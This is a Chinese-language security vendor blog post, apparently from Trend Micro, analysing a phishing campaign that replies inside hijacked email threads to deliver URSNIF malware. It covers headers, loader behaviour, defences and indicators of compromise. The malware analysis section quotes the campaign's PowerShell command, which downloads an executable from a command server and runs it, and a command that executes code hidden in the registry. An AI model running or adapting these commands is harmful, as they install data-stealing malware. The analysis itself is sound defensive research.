新型態網路釣魚:以熟人回信手法散發病毒, 教育、金融及能源產業為攻擊目標

雖然,絕大多數的網路釣魚(Phishing)行攻擊動本質上都相當單純,也容易辨識,因為它們通常都假冒某個合法機構發信,然後隨附惡意檔案或者在內文當中包含惡意連結。不過,我們在今年 9 月發現了一波垃圾郵件採用了一種更精密的網路釣魚手法。這波垃圾郵件使用了預先駭入的電子郵件帳號,以回覆現有電子郵件對話串的方式來散布惡意程式。由於該郵件是發到既存的對話串當中,因此很容易讓收件人不知不覺上當。等到受害者發現自己遭到網路攻擊時,通常為時已晚。

此波攻擊非常類似 Talos 在今年稍早所發現的 URSNIF/GOZI 垃圾郵件攻擊行動,後者使用的是預先駭入並收編至 Dark Cloud 殭屍網路(botnet)的電腦來發送電子郵件至已經存在的對話串當中。因此,這波行動很可能是上一波攻擊的延續或衍生攻擊。

趨勢科技從目前蒐集到的所有資料當中發現,這波行動主要攻擊北美和歐洲地區,但我們也在亞洲和拉丁美洲地區發現一些零星的類似攻擊。而攻擊的目標以教育、金融及能源產業為主,不過也出現在房地產、運輸、製造和政府機關等其他產業。

留意警訊

為了說明這波網路釣魚攻擊的可信度有多高,我們在下面附了一個電子郵件樣本 (如圖):

 Figure 1. Example of a malicious email that is used to reply to a conversation

圖 1:回覆某電子郵件對話串的惡意電子郵件樣本。

由於信件是來自熟人,而且是回覆現有的對話串,因此很容易讓收件人不疑有詐。除此之外,信件的主旨和文法也似乎沒什麼錯誤,甚至信件結尾還附上個人簽名。

不過,如果仔細觀察一下就會發現這封電子郵件還是有可疑之處。最明顯也最大膽的就是原本的對話串使用的是法文,突然冒出一封英文的回覆郵件。此外,惡意郵件的簽名也與正常郵件的簽名樣式不同。最後,惡意郵件的內容相當空泛,而且可能跟對話串的內容有點不相干,這雖然不能算是攻擊的直接證據,但也算是一種警訊。不過,收件人可能不會一眼就注意到這些細節,尤其對於每天必須處理大量郵件的人來說。

 Figure 2. Comparison between the malicious email and a legitimate one. Note the difference in language and the changed signature

圖 2:惡意郵件與正常郵件比較。請特別留意其所用語言與簽名樣式不同。

查看電子郵件標頭

在檢查電子郵件標頭資料之後,趨勢科技也發現了這波攻擊有些令人玩味之處。

 Figure 3. The anonymized email header of the malicious message

圖 3:惡意郵件的匿名化電子郵件標頭。

有三個地方值得注意:

  1. 一般的垃圾郵件,其 SMTP 標頭的寄件人欄位通常是假的,但「Return-Path」或「Reply-To」這兩個回覆地址欄位通常是真的。如此,當受害者上當回覆郵件時,歹徒才能收到郵件。但在我們採集到的樣本當中卻看不到這兩個欄位,所以,所有的回覆信件都會回到寄件人的信箱,也就是歹徒用來發信的帳號。因此歹徒極可能已完全掌握了該帳號。
  2. 此外,信中包含了「In-Reply-To」標頭欄位 (以及其他類似的 SMTP 欄位),這顯示這封訊息是回覆原本已經存在的電子郵件對話串。
  3. 該郵件的第一個轉跳節點是「rrcs-50-74-218-2.nyc.biz.rr.com」。對一個家庭使用者來說,這樣的位址算是相當稀鬆平常,但如果是公司的電子郵件帳號,除非是遠端工作者,否則其郵件一開始應該是從企業內部的伺服器送出才對 (也就是從「sender.co.ca」網域內的某台主機)。

從以上各種因素來看,很有可能不論電子郵件帳號原本位於哪個國家,歹徒的電子郵件都是從美國發出。例如上述範例當中,寄件人地址的國碼是「.ca」,表示這個電子郵件帳號應該是位於加拿大。

若再深入研究就能發現,這台發信的主機也以許多不同的電子郵件地址發送了好多信件,而且全都在 2018 年 9 月期間。

此外,我們也注意到,駭客通常會將附件檔案的名稱取得跟寄件人所屬機構名稱相同,這樣做應該是為了提高可信度。附件檔名的格式通常為 [寄件人公司名稱]+[某個與對話串相關的動詞,例如 Inquiry (詢問)或 request (請求)].doc或者單純只是 [寄件人公司名稱].doc。由於寄件人和檔案名稱相符,所以信件乍看起來可信度蠻高。在某些情況,我們也注意到歹徒會使用一些很通用的檔案名稱,例如「Inquiry」(詢問)、「Statement」(聲明) 和「Request」(請求)。

從郵件標頭的內容我們可以推測,歹徒應該是已經掌握了某個合法的電子郵件帳號,然後再利用這個帳號來從事類似變臉詐騙攻擊或稱為商務電子郵件入侵(Business Email Compromise, BEC)的攻擊。就其手法和技巧來看,我們懷疑這波新的垃圾郵件有可能是稍早 URSNIF/GOZI 垃圾郵件攻擊行動的延續。有一種可能性是,前述寄件人的 IP 位址是某台已經遭歹徒入侵的電腦,並且已被收編到歹徒的殭屍網路旗下。

惡意檔案分析                      

如果使用者點兩下隨附的惡意 .doc 檔案,就會呼叫 PowerShell 系統工具到某個幕後操縱 (C&C) 伺服器下載最新版的 URSNIF 惡意程式 (趨勢科技命名為 TSPY_URSNIF.THAOOCAH),並執行其下載的檔案:

  • powershell $VWc=new-object Net.WebClient;$wIt=’http: //t95dfesc2mo5jr. com/RTT/opanskot.php?l=targa2.tkn’.Split(‘@’);$jzK = ‘369’;$Aiz=$env:public+’\’+$jzK+’.exe’;foreach($fqd in $wIt){try{$VWc.DownloadFile($fqd, $Aiz);Invoke-Item $Aiz;break;}catch{}}

該檔案是惡意程式的主要載入器。不過,在執行惡意行為之前,它會先檢查作業系統版本,因為該程式只能在 Microsoft 作業系統上執行,更確切一點是 Windows Vista 與更新的版本。除此之外,它還會避開一些地區,例如中國和俄羅斯。

主要載入器會管理整個執行過程並將事件記錄在一個文字檔內:

  • %User Temp%\{暫存檔名}.bin

 Figure 4. Logs of the malware’s loader

圖 4:惡意程式載入器記錄檔的內容。

此外,它還會從 C&C 伺服器下載其他模組並儲存在系統登錄當中,位置在:HKEY_CURRENT_USER\Software\AppDataLow\Software\Microsoft\3A861D62-51E0-15700F2219A4

下圖顯示歹徒產生的系統登錄機碼和數值,裡面儲存著一些腳本和二進位程式碼。

 Figure 5. The registry key and entries containing scripts and binaries

圖 5:含有腳本和二進位程式碼的系統登錄機碼和數值。

請注意,雖然這些機碼和某些數值的名稱會隨每台電腦而不同,但其機碼位置永遠在「HKCU\Software\AppDataLow\Software\Microsoft\」底下。

待需要的元件下載之後,就會執行 comsxRes (此名稱會改變) 數值當中儲存的 Powershell 腳本。以下的指令列參數示範駭客如何運用系統登錄當中的 16 進位數值。

  • exe /C powershell invoke-expression([System.Text.Encoding]::ASCII.GetString((get-itemproperty HKCU:\Software\AppDataLow\Software\Microsoft\3A861D62-51E0-7C9D-AB0E-15700F2219A4).comsxRes Figure 6. Hex values of comsxRes

圖 6:comsxRes 中的 16 進位數值。

此外,駭客採用的是無檔案式執行程序,一開始是利用這個腳本來載入系統登錄內儲存的二進位程式碼。在下圖當中,我們將二進位資料部分內容換成「–{hex-encoded binary}–」以顯示完整的程式碼。在原始的腳本當中,其末端還採用了 base64 編碼,這部分我們也將它解開以方便閱讀。

 Figure 7. Code of the embedded binary that is stored in the registry

圖 7:系統登錄內儲存的二進位內嵌程式碼。

它會在產生的系統登錄機碼當中搜尋「Client32」或「Client64」數值然後將對應的程式碼注入「explorer.exe」(Windows 檔案管理員) 當中來常駐記憶體內。系統登錄中的其他數值對後續的動作非常重要,因為被注入的惡意程式碼在後面會用到這些數值。例如,「TorClient」數值是用來讓惡意程式可以經由 TOR 網路跟 C&C 伺服器通訊。

資訊竊取行為

最終的惡意檔案是一個名為「Client32」或「Client64」的 DLL 檔案,視主機的系統架構而定。同樣的,這個 DLL 也是儲存在系統登錄當中,如同惡意程式的其他元件一樣。最終惡意檔案的目標是竊取資訊,包括以下資訊:

  • 系統資訊
  • 已安裝的應用程式清單
  • 已安裝的驅動程式清單
  • 目前正在執行的處理程序清單
  • 網路服務清單
  • 外部 IP 位址
  • 電子郵件登入憑證 (IMAP、POP3、SMTP)
  • Cookies
  • 憑證
  • 螢幕畫面擷取 (.AVI)
  • 經由網站注入手法擷取金融相關資訊

BSS 區段

所有我們分析過的 URSNIF 二進位檔都含有這個加密區段。此區段包含其程式碼當中會用到的所有字串,而且只有在執行時期才會解密開來。這一點讓分析工作更為複雜,因為研究人員無法進行字串分析或反組譯。

躲避沙盒模擬分析 / 反分析機制

為了防止資安廠商的沙盒模擬分析取得其相關資訊 (如伺服器位址和組態),URSNIF 的程式碼當中有兩處會檢查游標所在位置。如果游標位置完全不動,就很可能代表自己正在沙盒模擬分析環境或除錯器當中執行。這項檢查會在 BSS 區段解密之前執行,因此如果沒有處理好的話,程式將陷入無限迴圈 (字串也會變成亂碼)。

從我們看到的攻擊來看,歹徒似乎仍在持續微調其網路釣魚手法,試圖開發出更有效的誘騙技巧。這幫網路犯罪集團已不再使用一般的網路釣魚郵件,而是巧妙地將攻擊融入現有的對話串當中,讓一般使用者更不易察覺。這項新的演變只不過是歹徒與資安研究人員彼此鬥智的冰山一角。

防禦與最佳實務原則

網路釣魚攻擊之所以能夠得逞,就在於巧妙運用了社交工程技巧製造出一種讓人容易掉入的情境,並巧妙運用互動來誘騙使用者提供自己的資訊或下載惡意程式。本文探討的案例狡詐之處在於寄件人是一個真實企業的真實使用者帳號。可能的話,使用者應盡量啟用雙重認證 (2FA) 來保護自己的網路帳號。此外,企業最好也在自己的系統當中加入雙重認證機制,或者考慮採用提供這類驗證的服務。

以下是一些有助於防範網路釣魚攻擊的最佳實務原則:

  • 企業內的所有使用者皆應學會辨別可疑電子郵件,包括何謂網路釣魚以及網路釣魚如何運作。
  • 任何可疑的要求 (例如要求匯款) 皆應經由不同的人員再次確認。隨時保持警戒,尤其在處理金融交易相關作業時更應特別小心謹慎。
  • 避免點選任何需要變更 Word 安全設定的文件,因為這很可能是惡意檔案的徵兆。
  • 仔細留意訊息當中所有可能的異常之處,包括唐突的內容。例如,在本文案例當中,原本的郵件對話串是使用法文,竟突然冒出一封使用英文的網路釣魚郵件,就是一個唐突的例子。

託管式偵測及回應

隨著網路釣魚攻擊越來越精密,企業內部的 IT 或資安團隊可能很難隨時監控網路和端點是否出現攻擊的徵兆。當然,員工的資安意識肯定有所幫助,但有時候要判斷一封電子郵件是否為惡意郵件會有相當的難度,尤其是當歹徒的技巧相當高明的時候,例如本文的案例。

對於缺乏資安營運中心 (SOC) 編制的企業來說,這項工作更是加倍困難,因為一般的 IT 團隊通常缺乏威脅研究與分析的相關訓練和經驗。對於這樣的企業,趨勢科技的託管式偵測及回應(managed detection and response,MDR)  服務就能協助企業對抗這類進階威脅。由於 MDR 的服務團隊通常是驗豐富的資安專家,因此熟悉各種強大的資安技術,能有效保護端點與網路。MDR 服務不僅能分析威脅,更能針對各種環境的攻擊徵兆提供相關情境資訊作為威脅調查的基礎。

趨勢科技解決方案

趨勢科技的各項端點防護產品,包括:趨勢科技HYPERLINK “http://www.trendmicro.tw/tw/business/complete-software-protection/index.html” Smart Protection Suites 和 阿德Worry-Free Business Security 解決方案能偵測並攔截威脅相關的惡意檔案、電子郵件以及相關網址,有效防範使用者和企業遭到侵襲。此外還有趨勢科技HYPERLINK “http://t.rend.tw/?i=NDIwMw==”Deep DiscoveryHYPERLINK “http://t.rend.tw/?i=NDIwMw==”進階網路安全防護  解決方案可提供一道額外的電子郵件檢查,幫助企業偵測惡意的附件和網址。

趨勢科技XGen™ 防護 融合了跨世代的威脅防禦技巧,能保護系統,防範各種威脅,包括:勒索病毒和虛擬加密貨幣挖礦惡意程式。它具備了高準度機器學習技術,可在閘道端點上攔截威脅,保護實體、虛擬和雲端工作負載。XGen™ 防護能藉由網站/網址過濾、行為分析及客製化沙盒模擬分析,來防範今日針對企業設計的威脅,這些威脅不僅能避開傳統資安防禦,更能利用已知、未知或尚未公開的漏洞,竊取個人身分識別資訊或執行不肖的挖礦程式。精準、最佳化、環環相扣的 XGen 防護是趨勢科技產品的基石。

入侵指標 (IoC)

.doc 檔案雜湊碼

趨勢科技命名為「TROJ_FRS.VSN0BI18 / Trojan.W97M.POWLOAD.SMY」

  • bdd3f03fb074c55cf46d91963313966ce26afdb13b1444258f8f9e7e723d8395
  • dd7b4fc4d5cc1c1e25c800d5622423725a1b29000f93b658a54e267bbbe6f528
  • 4df47982fdd1ac336625600fa8c947d45909248309b117d05fc532a2260c7bc4

趨勢科技命名為「Trojan.W97M.POWLOAD.FGAIBT」

  • f88ef62f2342f4d1105cfe85395b735efd3f0308b79551944983ce245d425510
  • 567fe3794a9eec27697ae0634861d284279261880887f60a7374c6cbe63b7674

趨勢科技命名為「Trojan.W97M.POWLOAD.NSFGAIBF」

  • 52d3ece98b6b3b686925156c3d62d8ce133fe3326e11b4c981c251452e4a41d2

趨勢科技命名為「Trojan.W97M.POWLOAD.SMEMOT」

  • 4d0762a6b2879d2fa821716db76bc980fdb3b8507611d2853df58c0d4127f9ea

趨勢科技命名為「Trojan.W97M.POWLOAD.SMEMOT2」

  • 47e2c66ba16e3ffa9704a13f2c00670319bf292b3d2aa7deede5442da02181e5
  • c2c946f7fd63fc15048a9af4043686f5a56b169e74cb36892fb8d1563b810467

趨勢科技命名為「Trojan.W97M.POWLOAD.SMTHF3」

  • 21ce42a1fc6631ed10db3d0e44b4ccb6d96a729fc494bd86a57cf07ff72cb8f2

趨勢科技命名為「Trojan.W97M.POWLOAD.SMY」

  • de8f8f39259992886da3b07635cbf121027379e5c1a156a32c6c6e5ace3cc4c3
  • 6b387b8534da9cc7cf0af4f2fb8c2a92f9316c0ea6ffb9cfe49b09b4c3df9778
  • 6bf99f4b17a07e788219333d96a7a19c9eddc1b49d16c2a21da255a6a16c80d5
  • 33d078881456e3b930c480803902fa28142b17c8550f3932e7cf4a1df0eb9213
  • 6ca2d4dcea456b9d4c87f211ed20bb32f71a0c78ee8059b934162e643d66e0c9
  • 82bee0c249b63f349d212a36f0b9ad90f909017ac734eac133353a1135d7474d
  • 1f2e12a58cc23f4e6e7f17b8c1a5c50b88614fda103577354b9564f2dffc257f

趨勢科技命名為「W2KM_POWLOAD.FGAIBT」

  • 1db71aec64d0e391a8c99f4f6ee214962a281733643ace0874cf69e2843f448c

趨勢科技命名為「W2KM_POWLOAD.NSFGAIBF」

  • c33d642da477f65c11daa9e8098b9917c4c5a6f131dd1369a20cb1b14c4cc261
  • 398e677290b1db00d8751c3498847ad9c7d10721630175d2506c4d45af19d229
  • 813a08d3b2216c89d42e8225c6de760d785905d1c76bd7428201d68c3c368f65

趨勢科技命名為「W2KM_POWLOAD.THIACAH」

  • 5aed7d6a3e8692143e53f9556cd3aa371149c96b91c02d1c659cb58d88572e47

惡意程式所下載的 URSNIF

趨勢科技命名為「TSPY_URSNIF.THAOOCAH」

  • 0a38d92775cfc7182076d9a21c4937149ea8be6ebf22b9530afbca57d69c0d46

惡意執行檔

趨勢科技命名為「TrojanSpy.Win32.URSNIF.BAIEF」

  • 358bd52ac46755b1c6fa73805a7a355450f85f4bcf1b2e798a04960743390422

趨勢科技命名為「TSPY_URSNIF.THAOOCAH」

  • e8633f2f2b6b0b8f7348b4660e325ab25b87ec8faa40fb49eb0215b31bd276aa

趨勢科技命名為「TSPY_URSNIF.BAIEB」

  • f92ba10fe245c00575ae8031d4c721fe0ebb0820a4f45f3bbce02654a6e7f18d

下載網址

  • hxxp://t95dfesc2mo5jr[.]com/RTT/opanskot[.]php?l=targa2[.]tkn
  • hxxp://enduuyyhgeetyasd[.]com/RTT/opanskot[.]php?l=omg8[.]tkn
  • hxxp://q0fpkblizxfe1l[.]com/RTT/opanskot[.]php?l=targa4[.]tkn
  • hxxp://2dhtsif1a8jhyb[.]com/RTT/opanskot[.]php?l=okb1[.]tkn
  • hxxp://yrtw1djmj6eth7[.]com/RTT/opanskot[.]php?l=okb7[.]tkn
  • hxxp://popoasdzxcqe[.]com/YUY/huonasdh[.]php?l=rgr7[.]tkn
  • hxxp://q0fpkblizxfe1l[.]com/RTT/opanskot[.]php?l=targa2[.]tkn
  • hxxp://e3u1oz4an1dqmj[.]com/RTT/opanskot[.]php?l=okb9[.]tkn
  • hxxp://popoasdzxcqe[.]com/YUY/huonasdh[.]php?l=rgr3[.]tkn
  • hxxp://2dhtsif1a8jhyb[.]com/RTT/opanskot[.]php?l=okb5[.]tkn
  • hxxp://hbhbasdqweb[.]com/YUY/huonasdh[.]php?l=rgr4[.]tkn
  • hxxp://q0fpkblizxfe1l[.]com/RTT/opanskot[.]php?l=targa4[.]tkn

幕後操縱 (C&C) 伺服器

  • app[.]kartop[.]at
  • doc[.]dicin[.]at
  • doc[.]avitoon[.]at
  • app[.]avitoon[.]at
  • ops[.]twidix[.]at
  • xx[.]go10og[.]at
  • api[.]kartop[.]at
  • m1[.]fofon[.]at
  • cdn[.]kartop[.]at
  • api[.]tylron[.]at
  • chat[.]twidix[.]at
  • api[.]kaonok[.]at
  • chat[.]jimden[.]at
  • mahono[.]cn

 

原文出處:Phishing Campaign uses Hijacked Emails to Deliver URSNIF by Replying to Ongoing Threads 作者:Erika Mendoza、Anjali Patil 及 Jay Yaneza

 

PC-cillin 雲端版整合 AI 人工智慧的多層式防護,精準預測即時抵禦未知威脅 >>即刻免費下載試用

《 想了解更多關於網路安全的秘訣和建議,只要到趨勢科技粉絲網頁 或下面的按鈕按讚 》

《提醒》將滑鼠游標移動到粉絲頁右上方的「已說讚」欄位,勾選「搶先看」選項,最新貼文就會優先顯示在動態消息頂端,讓你不會錯過任何更新。
*手機版直接前往專頁首頁,下拉追蹤中,就能將粉絲專頁設定搶先看。

 

▼ 歡迎加入趨勢科技社群網站▼

好友人數